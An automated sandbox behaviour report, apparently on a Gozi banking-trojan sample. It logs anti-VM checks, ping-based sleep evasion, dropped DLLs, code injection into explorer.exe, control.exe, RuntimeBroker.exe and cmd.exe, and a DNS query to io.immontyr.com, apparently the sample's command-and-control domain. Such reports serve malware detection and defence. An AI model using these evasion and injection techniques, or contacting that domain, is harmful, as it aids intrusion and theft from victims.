Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR

Uses ping.exe to sleep

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Users\user\Desktop\gozi.exe TID: 6140	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe TID: 7076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 78 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1304	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\gozi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4982			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4237			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

API coverage: 3.9 %

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5n300s0s.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hscan34n.dll			Jump to dropped file

Source: C:\Users\user\Desktop\gozi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_03F18409

Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000029.00000000.614665708.00000163C4E00000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.487973669.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000012.00000002.422959033.000002BC06C24000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: gozi.exe, 00000002.00000002.327636838.000000000153E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	47_2_03052ECF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress,

8_2_004012E6

Source: C:\Users\user\Desktop\gozi.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\gozi.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F016AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		8_2_03F016AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030316AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		47_2_030316AF

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: C:\Windows\System32\control.exe base: F00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 2B40000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 20FDE800000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 163C5220000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D50000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Show sources

